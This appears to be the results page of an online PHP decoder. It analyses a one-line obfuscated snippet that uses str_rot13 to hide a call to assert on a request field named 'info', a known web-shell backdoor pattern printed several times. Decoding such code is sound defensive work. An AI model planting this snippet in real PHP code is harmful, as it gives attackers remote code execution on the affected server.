Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $license = str_rot13('n'.'f'.'f'.'r'.'e'.'g'); $license($_post['info']); ?>..

Decoded Output download

<?php $license = str_rot13('n'.'f'.'f'.'r'.'e'.'g'); $license($_post['info']); ?>

Did this file decode correctly?

Original Code

<?php $license = str_rot13('n'.'f'.'f'.'r'.'e'.'g'); $license($_post['info']); ?>

Function Calls

assert 1
str_rot13 1

Variables

$license assert

Stats

MD5 e9fe9fd0950ade1674ef7f77d498c39d
Eval Count 0
Decode Time 82 ms